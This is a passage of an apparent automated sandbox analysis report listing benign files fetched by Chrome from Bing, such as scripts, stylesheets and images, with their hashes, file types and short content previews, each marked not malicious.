                                                                                                    SSDEEP:3:yionv//thPl3xWrE9/gnbBE1d7snLQNylzkIgDhqo/1ir1216rTmVN80S+st2up:6v/lhPKwCnFGgQNyld+/ou6Hp0NsTp
                                                                                                    MD5:7D4555B1487EC50930C7567B2690BF10
                                                                                                    SHA1:544C4B9A47D0D12FD38FDC07900D32D31C0F600F
                                                                                                    SHA-256:50BBDF35A7DE6804B4E50971D7E3656D6C8100E4A03CF935F841D0AFD47D8371
                                                                                                    SHA-512:F293E1F06C7244C2FD080A65C3A32D134A6AF23E9148B8A391E242D8EA36297FFE8C500903B9B65A6E450EB1731ECF28CBE0A67F6E246938501BEBDDA5A6B177
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?id=ODLS.33c6a76b-616a-4fc5-ac11-7a644a97dc30&w=32&h=32&qlt=94&pcl=fffffa&o=6&pid=1.2
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J....sIDATXG....0...7...#.}$.....N..bu...,.....>>.mm....8....K....@....NW..n......cL..7....0....\...v.k.. ......`x....GT..{....IEND.B`.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (7083), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):7083
                                                                                                    Entropy (8bit):5.288135136196839
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:oPC0FYuV4Ja/ikwCk9SoaZ8fWqVHgdKMBM/xVIU27KX3QC0UylwOCDk+h+16TN:afbh/eCLoaZBqhJQM/cxGnQC2Z+kYEqN
                                                                                                    MD5:0E84FCB6403B13A8458D66EBCF66E53B
                                                                                                    SHA1:2621AFA6DFB35A0392837505C3CDD0F5BB91E089
                                                                                                    SHA-256:02B0BD64A0FA50ED4655ADD6325858BA2BCDC33978DCD9D93F4B3C5EDDB05697
                                                                                                    SHA-512:9FBFD419ECFCE55444A4DEA65389204E2A19ECC325F31BEC3DC27683BE29AB94AEA1CF2374F0BC252D21A8856324788E146F3CD2E00983C2A312A0FADEA724E8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/JiGvpt-zWgOSg3UFw83Q9buR4Ik.js
                                                                                                    Preview:var LGWidget;(function(n){function rt(n,t,r,h,c,l,v,k,d,g,nt){var rt,tt,it,ft,ut,et;(h===void 0&&(h=!0),c===void 0&&(c=!1),l===void 0&&(l=!1),v===void 0&&(v=!0),k===void 0&&(k=0),d===void 0&&(d=!0),g===void 0&&(g=!1),nt===void 0&&(nt=!1),rt=n+"Container",tt=_ge(rt),c&&(tt=sj_ce("div",rt,"b_widgetContainer"),it=sj_ce("a",n+"CtaBtn","b_widgetCtaBtn"),ft=sj_ce("div",n+"Gradient","b_widgetGrad"),it.target="_blank",it.rel="noopener noreferrer",tt.appendChild(it),tt.appendChild(ft)),tt&&t)&&(r&&tt.insertBefore(r,tt.firstChild),l&&(i||f)?(f?e.insertBefore(tt,f):e.insertBefore(tt,i),sj_be(_w,"scroll",s(ot.bind(this,n,k),100))):(t.appendChild(tt),t.style.position="relative",p(n,t),b(n),v&&!o(t)?sj_be(_w,"scroll",s(w.bind(this,t,n,h),100)):(a(tt,h),u(n))),d&&sj_evt.fire(y,n,!0),g?(ut=_ge(n+"CtaBtn"),tt.style.cursor="pointer",sj_be(ut,"click",function(n){sj_sp(n)}),sj_be(tt,"click",function(){ut.click()})):nt&&(et=_ge(n+"CtaBtn").getAttribute("href"),tt.style.cursor="pointer",sj_be(tt,"click",fun
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (824), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):824
                                                                                                    Entropy (8bit):5.3314854117420465
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:2QQ3xVJjKVJ5o7VEioPVKofuVJ0PoRGP2QbAX53CO2Wd6o0YmmBM:AjWUJEhNZsvc8XgO2Wdh0Jm6
                                                                                                    MD5:3FF8EECB7A6996C1056BBE9D4DDE50B4
                                                                                                    SHA1:FDC4D52301D187042D0A2F136CEEF2C005DCBB8B
                                                                                                    SHA-256:01B479F35B53D8078BACA650BDD8B926638D8DAAA6EB4A9059E232DBD984F163
                                                                                                    SHA-512:49E68AA570729CC96ED0FD2F5F406D84869772DF67958272625CBA9D521CA508955567E12573D7C73D7E7727260D746B535C2CE6A3ACE4952EDF8FD85F3DB0DD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:(function(){function i(){var f="data-load",u,i;if(n&&!n.hasAttribute(f))try{if(_d.body.appendChild(n),typeof sj_gx=="function"){if(u=r.replace("%IG%",_G.IG).replace("%IID%",n.getAttribute("data-iid")).replace("%PARTNER%",n.getAttribute("data-ptn")).replace("%ENABLEP%",n.getAttribute("data-ep")).replace("%ICONPRELOADED%",n.getAttribute("data-iconpl")),n.setAttribute(f,"1"),i=sj_gx(),!i)return null;i.onreadystatechange=function(){typeof sj_appHTML=="function"&&4==i.readyState&&200==i.status&&sj_appHTML(n,i.responseText)};i.open("GET",t?SbiTst.at(u):u,!0);i.send(null)}}catch(e){}}function u(){if(n){var r=n.getAttribute("data-evt");r&&!t?sj_evt.bind(r,i,!0):i()}}var r="/images/sbi?mmasync=1&ig=%IG%&iid=%IID%&ptn=%PARTNER%&ep=%ENABLEP%&iconpl=%ICONPRELOADED%",n=_ge("sbicom_loader"),t=typeof SbiTst!="undefined";u()})()
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:58:04], progressive, precision 8, 160x160, components 3
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):4409
                                                                                                    Entropy (8bit):7.661436320849241
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:sZbhwhNizUZvpj+cq69L5CiYXL6UIwLxl3LeD:sWzj+cq615Te+Se
                                                                                                    MD5:A98A08BDB99B8422C9DC9D6FDD9387C3
                                                                                                    SHA1:967E5342AE802167DC06576E0E4FB96E76893296
                                                                                                    SHA-256:5FAB9EE214738E71D6C01392EBC7B1EEC09EF8E19CA508EF28154E3E7A769ACF
                                                                                                    SHA-512:660020F40078ADA6A3E3DB7B55063D3E3603F82CFBB3ACF81FE2DF53F23064414C78DAF8657C6E556ADCC4D2034EC077F8C0B4A7720018E457DAFDEEF0323476
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/ln5TQq6AIWfcBlduDk-5bnaJMpY.jpg
                                                                                                    Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:58:04....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;.............................................................................................. (... ....@..........(.@..............(.................R. .......................f.....#x.....6.9.]...f.*...........|:......b...=....M}.}3/...H..{},k...x..`B.....z........y..9.yv.....9....>n...f...W......ug'.x..6:-3.a.iaHB.@.T.. .Q.@.)A.....At`..(..X!..0t).H...........s.uR6E.J.K9.@*.$.Es....&.........................!.. "A$10Bp.............o.wb.H2......p....H..m....ez.5.5....L.%.i....'..).s....$..q...E.....yxe-d<.VI...<s.~K....4.o.?.y.NY3r1..5...M9F..^Q...y..........>$.&r.g ..MK.qe....5.......~!.....\.&|....!5...`9.)F.R;.fY.%.&.={..R.A.....>.y....E.Q._....<.|_...J.....z&_
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:51:08], progressive, precision 8, 160x158, components 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4547
                                                                                                    Entropy (8bit):7.735536921390623
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ssb41dk9JozAQ8d2SuBK76KrZDoDBtnFKiDo8TzNnNJSHvLPS:sj1eozAQ8d2VPGoBBFfM4fJSHDPS
                                                                                                    MD5:7AEF4CCF6E47B9BA038365CD3D1F5693
                                                                                                    SHA1:71F7957F6FAE574854A374E84DB2E3CEDBA89969
                                                                                                    SHA-256:08102BA7A0388B1AFC9A351B3387B2DDEDA846551303170E0273B2F305AECCB2
                                                                                                    SHA-512:29AC1E6BADF62C61B4FA889EA1B0436D3B9107A60BA03801DFA8E23A4D8BCCF42C09BB7CC7E6CD9FACB8D140DB7E0D4F0EEB3D7D8A3B9B38B1D2B95113005320
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:51:08....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;...........................................................................................VQJ,..R...)..(..R..d.Y@...h..%(.AW(T.)...5.,.%.2[.."*!l...Z......@I..T.......@3.@....D@ ..l.)E.P....ts......@... E".W/G...........IQ..I|../.,..W..(....WY.1<.t..=....K...C....-.1..s.[l...^].mO7|..:.kda5....o.=.S.8.;....~e,.......1v..~5.:s'$..u.i..k.7._E25...f6v..Nk.&)....S.r...ovn5...k9k...u.D...f&.......e.+.7......d..7K.R]..f..K..l...r...*.K.b..s29...y;..U.E(.qH....,....QS%..@....'......................... !."1.#$0@.`............R.J..e~...+.J.....y..7#..^....,.....@.3..`.....L...[u.!.../...*;[7.,...a....[._W...B;.....4g+../c..>g...!..U..Q...0...$..F%...u|.2?.V.>.v..2.2.S.c..km)
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 43 x 12, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1049
                                                                                                    Entropy (8bit):7.709152266456816
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:por4A/+bZE41p0gId8dqMIQJgYa1JMOSY6wA8wMkf:posA/6PpdIdQqQJnaLMA6wAFMA
                                                                                                    MD5:3887806F14B6B1E3887FDD8A21BF2C3E
                                                                                                    SHA1:7A6AEA5F8D3B8FB103F63606F73E0383FEB69DBC
                                                                                                    SHA-256:6E75EFF300ACB9A3DA53628A3E34EC6749E3CF9A108784FDBAC9E12BFF690E5E
                                                                                                    SHA-512:D07645622C929A655A2ED11F5C6D66100DB784BB81D18649D5CB46CBF6C2E6BBAB1F5F76FB08FC6F2BE3BDA83094CAF4DA8EDD5C131DE852D507413D8782B4D0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://www.bing.com/th?id=OJ.kOKMdnoIEscfWg&pid=news&w=43&h=12&rs=2
                                                                                                    Preview:.PNG........IHDR...+...........DN....sRGB.........gAMA......a.....pHYs..........o.d....IDATHK.]..e.....Wi...zSD..^.!b.YI.....3..+"a..)Fy!)j.q.....$.j]...*....13.....J....;...>..W.......y..?.wF.G..VfU....r.=...Fe.tf._.(<...&..U.:^!......Q..l?.{...`..f.rOO......j.n...g).Y.p"/|r...xOG.L.......l.\..C.S...q.'Uj.m8..TI98....S........7...<....V.....{...w:..~..u.m._g..)...i........)g#[@..5[.bR....q&.\/.el.3u..f$.C.eb.`.S..L<.^...x?... @.j3q)...nN...}$Y..'....W........K.k..._...z.l,...k..(.."..E.U.u(>....f..9rDp.^rd.X.g)|1&K;...R..Uh..........23A......O.o.......Xl2B....m..b~oy.......Y..1k7>%.<;U..9.N>..s......o......9.9.B<o.%..s,!._.+..W's..M.$#.y..I..G...|...1.J.;..-+....>.`vl_5..B.:....d....s.?..8.....\...ln osx..r...@!........-s.-b..n.~/1.m....`.H.5>T:8..,.......jU..$o..~.e....a..!..h.n...&.(..K.SV..7..3......0;.n.U...$....T..ET......r.]oL.z.....!.;....'.RE.......&.|.._.mT.......a.^.n..*..A.<.o..../9{..~......~.x.b...:.v..7._.w...|[X.Y...j}...6..
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1345), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1345
                                                                                                    Entropy (8bit):5.057450072266418
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:RcedenXv30NJFhjwmiNaxjfvjDminlYXrH5uR914H9HzrhLVD/WhMPcejOVYa:2edenfOJTiuDvmiEZuR92d3/TPlE
                                                                                                    MD5:1174545448FDCEEAC97791FB61E77D7E
                                                                                                    SHA1:1B849906F6A50216F85B902C562BA15358A2FE92
                                                                                                    SHA-256:43490C2CB9A634745C90E0CADAC31A900202732D8446A0C861E789CB191C9FD6
                                                                                                    SHA-512:32C6AA89EE6609718A7462CC55B1E7818403F1E79D73835C6B5A64DA9340036A23F7918CD095D51F6D4D86BA22D2A790CD84F562FCA61E0D059173FC9BE3C5B5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/G4SZBvalAhb4W5AsViuhU1ii_pI.js
                                                                                                    Preview:var NewsAnswerHoverEffect;(function(){"use strict";function e(){n&&(t(n,"mouseenter",".na_ti",f,!0),t(n,"mouseleave",".na_ti",i,!0),t(n,"mouseenter",".na_citem",f,!0),t(n,"mouseleave",".na_citem",i,!0),n.addEventListener("click",function(n){for(var u=n||window.event,t=u.target;t&&t.hasOwnProperty("parentNode")&&this!==t&&!(r(t,".na_citem")||r(t,".na_ti"));)t=t.parentNode;i.call(t,u)}))}function f(){var n=o();this.setAttribute("mouseEventId",n);Log.Log(u,"News.Answer.Card.MouseEnter","UserMouseEnter",!1,"MouseEventId",n)}function i(){var n=this.getAttribute("mouseEventId");n&&(this.removeAttribute("mouseEventId"),Log.Log(u,"News.Answer.Card.MouseLeave","UserMouseLeave",!1,"MouseEventId",n))}function o(){var n=function(){return Math.floor((1+Math.random())*65536).toString(16).substring(1,5)};return[n(),n(),"-",n(),"-",n(),"-",n(),"-",n(),n(),n()].join("")}function t(n,t,i,u,f){n.addEventListener(t,function(n){var t=n||window.event,f=t.target;if(r(f,i))return u.apply(f,t)},!!f)}function r
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1059 x 736, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):421343
                                                                                                    Entropy (8bit):7.9930283068921435
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:12288:CzhXKcW0EjM7MmgItOOh5SdW8fgmAGbvEG:Czh6tI7MmqA5OW8fgfGbvT
                                                                                                    MD5:5EEEC8E6F540AAC271BB6D8BD113115A
                                                                                                    SHA1:B3256E64A78DD1A5CF6173ED958F69BC09E7E885
                                                                                                    SHA-256:434138E6620D458BEC6FB1F53DF26AAF6F57B4FDBDF14ED2EA03EDDF642A156A
                                                                                                    SHA-512:6D464624DA20CCE660174494492E14593E3A6765C4D01C223F68C38999BC83EF70E8E1BFD374EAE33295927C1B6A28F69716BBDA20591B2C31AE39C8F4EF7A49
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR...#................pHYs.........&.:4....sRGB.........gAMA......a...mtIDATx...[..q..w..y.o.=..Y3...[V..(.v.;R..m......cN....NU@q.....*.....*...@QI.(.!P.sp..%.$.f.....Y........D....Z..}.{x......>,.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z...$.E..}5....-Z.h.E..N.Z....h.F..^.I{...b.._._~}....}.^}...?.o...U>?|...W..w/|=..|..}...g......./...x.s......=..~..........g.Q<.....}...
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2278
                                                                                                    Entropy (8bit):7.856767134100099
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:iDKXGoj9PKXto6lKBcIxT/hdMvM3zqNLyGqXKkBeDwRtR5c7upprdE3m:i8v9PKXmTBrMk3zqN4K4e05DppuW
                                                                                                    MD5:AF6A8C1315F461A7580BCDD0AE382928
                                                                                                    SHA1:D5C674FEEE0A2C29B1BE205F090BA91297825B79
                                                                                                    SHA-256:BAE9542A80849780EA4904578B980EE3B3D4845739E4A79ED069120FFB4704F5
                                                                                                    SHA-512:AD913D554E28AED786273064DD34D36DC8C4F0E036D3A1000F39A69C630039B677D346BDB7D0BB8A7489FA78DB42B0DB0F1324C8BC9D65D245596219947877A0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J.....IDATXG..yP....ig.h.Ij26.4...i...).j..<......(......d.Y... ."...Y..AVY...&>.*....V-26m.3s..w..|.{.J..XA..(....I.\_..P.mX.kX.\O.;.O.....u..zf.%.Z..[;4|:....7r...)h.......1.?%Id.....i.....jz.;D5P.l..?..=.FX.x...$.A3i4NM..y..W.e.Y....S.~s...:R|cZ..@.4.. ....nhJ. .....4...Q.....K..t.\.Z.}..1.x.6(sB.. ........e`E..@.4/..........N.rs..0_.v....K.r....1.dI.2...'j.W..|..8v........g. ..B....B3...).`_..;s..B9v.....q.z..z&...t~.#.mD..=.h.^.....d.....%.M{..(..U/.h(........'...>.....sF..qp.&....U..5....../i.e.s.H..C......M...D.[?-A+....C.&..n...m.....O..g.._...M.[2.a.<x..c...UL.Ky.t...<..g..(..Y..C.I....%PV4...mF..a[....`...#.qT.b..._./..ip.g..=..]....I&..N.e..^S.&.3.@ ..2... J...=....f.P.k..[.Z`..'n...Y...F..oRx.......`^.#.g.E..Zy*..R...>T.;.x.}......v.C...[..P.......'.lwhX.=.s.F.L..<*.]....98.4.R......`......M....&.....dz...s.....C>K......6..;_.Q'a...?.7...b~..y^....Z9..s.7...@..
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (824), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):824
                                                                                                    Entropy (8bit):4.9031871499321165
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:gsDJ9dOk7xQXcTW54Xc6yMcS2WUAPXc/GIu31VkeejPX8Pp:gsDJnfFQXcc4Xc81cuIaVkegPX8Pp
                                                                                                    MD5:6D94F94BFB17721A8DA8B53731EB0601
                                                                                                    SHA1:AE540DB8D146E17CFC3D09D46B31BD16B3308A6D
                                                                                                    SHA-256:21829C74FCE2C9BBBB3099A7A487DE71465ED712410C32BC6C69884DB07A90DD
                                                                                                    SHA-512:BF33FB4858B56F888108BCD5C2691613B68715E260E59C1E37A050A709BE04A8E0EAF5509667183A0D51F1201E58C02DF4F744A0772242EE5B61595C44C072E7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/rlQNuNFG4Xz8PQnUazG9FrMwim0.css
                                                                                                    Preview:#rewardsPanelContainer{position:fixed;top:0;right:0;width:376px;height:100vh;z-index:1100;box-shadow:0 0 0 1px #0000000d,0 0 0 2px #0000001a}#rewardsPanelContainer.darkMode{background:#11100f;color:#edebe9}#rewardsPanelContainer.b_hide{display:none}#rewardsPanelContainer #panelFlyout{width:102%;height:100%;border:none}#rewardsPanelContainer #panelHeader{background:#fff;padding:15px;display:none;text-align:center;justify-content:space-between;border-bottom:1px solid #ccc}#rewardsPanelContainer #panelHeader .title{font-weight:500;font-size:20px;line-height:22px;display:flex;align-items:center}#rewardsPanelContainer #closeRewardsPanel{position:absolute;right:15px;width:12px;height:12px;padding:8px;top:13px}#rewardsPanelContainer #closeRewardsPanel:hover,#rewardsPanelContainer #closeRewardsPanel:focus{cursor:pointer}
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (308), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):308
                                                                                                    Entropy (8bit):5.096104742721561
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:qR6NQTM+fHtRWPM/oXZeKE85whQvVt0iYGjmqjJLsmTczfIAO:w6NQtfNRW0/J8idihKq1LvTxAO
                                                                                                    MD5:E849F94CD30EC77987643A0D405E33E4
                                                                                                    SHA1:D911609DA72CCFA9CFC3DBEFC5DF00185C9A42BF
                                                                                                    SHA-256:B39968F3AB3C3867EFC7115C77D0239B0A2C505AE87766231BF46E32F7797C43
                                                                                                    SHA-512:DBC5EF102C16D14A99F090821176B3706BA08D87D1EFBA817D763AF969A10F9058C7AA0CE54D442DC816E84D294B52DC78623416044C1B6EFA59A28055B48504
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var ProgressiveImages;(function(){function n(){for(var n,t,r=_d.getElementsByTagName("img"),i=0;i<r.length;i++)n=r[i],t=n.getAttribute("data-src-hq"),t&&n.src!=t&&(n.src=t)}sj_evt.bind("onP1",n,1);sj_evt.bind("ajax.postload",n,1);sj_evt.bind("loadProgImages",n,1)})(ProgressiveImages||(ProgressiveImages={}))
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (841), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):841
                                                                                                    Entropy (8bit):5.164356246203931
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:9bGk4aZBJKbeS0YeHTwnJw7+GbSVTJjnWU+YWogltaOHUPbpbvN:hpCbe9YwZbSZRB+YgruDdV
                                                                                                    MD5:48833DEA59BC0B37177AB4C6C233DFBB
                                                                                                    SHA1:966780D21AD4544DB989E986B2FC3AB70983260C
                                                                                                    SHA-256:DE9CCA3CD151B7DD74DA15992299C993D91A424083C1EFB2A948230E87FECB4B
                                                                                                    SHA-512:B7E00BD79148657CA517B959C48B4E7E1F70CC7D5EC9B30DF5FBD0A7F6E9275F16797C7414CAC30FA6972F958D4A64E3AC45DC7D9BE8FD517F66D44AA78207EE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var AlgoInnovationAnchorUrlRedirect;(function(){function t(){function t(){var r=_d.querySelectorAll(n),t,u;if(r)for(t=0;t<r.length;t++)u=r[t],u&&sj_be(u,"click",i)}function i(n){var t,i;if(n&&(t=n.target,i="",t&&t.parentNode&&t.parentNode!=null&&t.parentNode.tagName==="A"&&t.parentNode.classList.contains("batgil"))){var e=t.parentNode,o=e.getAttribute("href"),s=o.split("#:~:text=")[0];i=u(o)?f(s,t.innerText):s+="#:~:text="+t.innerText;r(i)&&e.setAttribute("href",i)}}function r(n){return n&&/^https?:\/\/.+/.test(n)}function u(n){return n.indexOf("bing.com")>0&&n.indexOf("/ck/a")>=0?!0:!1}function f(n,t){var i,r;if(!n)return"";try{return i=n.match(/u=a1([^&]*)/),r="",i&&i.length>1&&(r=i[1]),window.atob(r)+"#:~:text="+t}catch(u){return""}}t()}var n=".tltg ";t()})(AlgoInnovationAnchorUrlRedirect||(AlgoInnovationAnchorUrlRedirect={}))
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):671
                                                                                                    Entropy (8bit):5.014579690661168
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:tbH4/KYf3UnlcWYl7qy/gk63xsV8tGXcqecDDWUV8jEPsycd23Wt+MKsAnueOc+d:t74LfEnTYpq+gTxs6GUUQEPssmYsAnuH
                                                                                                    MD5:D9ED1A42342F37695571419070F8E818
                                                                                                    SHA1:7DD559538B6D6F0F0D0D19BA1F7239056DFFBC2A
                                                                                                    SHA-256:0C1E2169110DD2B16F43A9BC2621B78CC55423D769B0716EDAA24F95E8C2E9FE
                                                                                                    SHA-512:67F0BC641D78D5C12671FDD418D541F70517C3CA72C7B4682E7CAC80ABE6730A60D7C3C9778095AAB02C1BA43C8DD4038F48A1A17DA6A5E6C5189B30CA19A115
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/fdVZU4ttbw8NDRm6H3I5BW3_vCo.svg
                                                                                                    Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... viewBox="0 0 16 16" enable-background="new 0 0 16 16" xml:space="preserve">..<path fill="#919191" d="M15.707,0.293c-0.391-0.391-1.024-0.391-1.415,0L7.994,6.591L1.696,0.293C1.298-0.091,0.665-0.08,0.281,0.318...c-0.375,0.388-0.375,1.003,0,1.391l6.298,6.298l-6.298,6.298c-0.384,0.398-0.373,1.031,0.025,1.415c0.388,0.375,1.003,0.375,1.391,0...l6.298-6.298l6.298,6.298c0.398,0.384,1.031,0.373,1.415-0.025c0.375-0.388,0.375-1.003,0-1.39L9.409,8.006l6.298-6.298...C16.098,1.317,16.098,0.684,15.707,0.293z"/>..<path fill="none" d="M0,0h16v16H0V0z"/>..</svg>..
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (597), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):597
                                                                                                    Entropy (8bit):5.118419789099075
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:KwOdMnCT1Q5tnasxfd7hq6IJCxmLgIJC1XayS/Y:KwsK5tLxF7hq1CULvC1CY
                                                                                                    MD5:BC03BF3C5385FC8CAA0B78FF9F288571
                                                                                                    SHA1:BA6A9BB281DDB4E568F20D983FCDA004E35B0E2C
                                                                                                    SHA-256:3F1053FD0025539D86800D82479859A309B5F55F9D82AA6187845B0D9A89FC6A
                                                                                                    SHA-512:EC7BB3480EB42B8A9864D6256817B15B4596CD258F984DB0142715398FF994E1376E2AE0C494967BE76A61CDF6FE3809D843E3179A514CB651BBFD5EA90DAD98
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var NewsAnswerBigLogoScroll;(function(){"use strict";function t(){var t,i;if(n(),"MutationObserver"in window){if(t=_qs(".ans_nws"),!t)return;i=new MutationObserver(function(){n()});i.observe(t,{childList:!0,subtree:!0})}}function n(){for(var r=_d.querySelectorAll(".big_pub_logo"),e=r.length,t=0;t<e;t++){var n=r[t],i=n.querySelector("cite"),u=n===null||n===void 0?void 0:n.getBoundingClientRect().width,f=i===null||i===void 0?void 0:i.getBoundingClientRect().width;u&&f&&f>u&&!n.classList.contains("scroll")&&n.classList.add("scroll")}}t()})(NewsAnswerBigLogoScroll||(NewsAnswerBigLogoScroll={}))
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (924), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):924
                                                                                                    Entropy (8bit):5.195012633286773
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:rVnoyfEzPHQFvG99rynERM93YGxSN+/sKE3p5vyNAM:rVnoyCkKgnCM9eBKE55vyj
                                                                                                    MD5:47442E8D5838BAAA640A856F98E40DC6
                                                                                                    SHA1:54C60CAD77926723975B92D09FE79D7BEFF58D99
                                                                                                    SHA-256:15ED1579BCCF1571A7D8B888226E9FE455ACA5628684419D1A18F7CDA68AF89E
                                                                                                    SHA-512:87C849283248BAF779FAAB7BDE1077A39274DA88BEA3A6F8E1513CB8DCD24A8C465BF431AEE9D655B4E4802E62564D020F0BB1271FB331074D2EC62FC8D08F63
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/VMYMrXeSZyOXW5LQn-ede-_1jZk.js
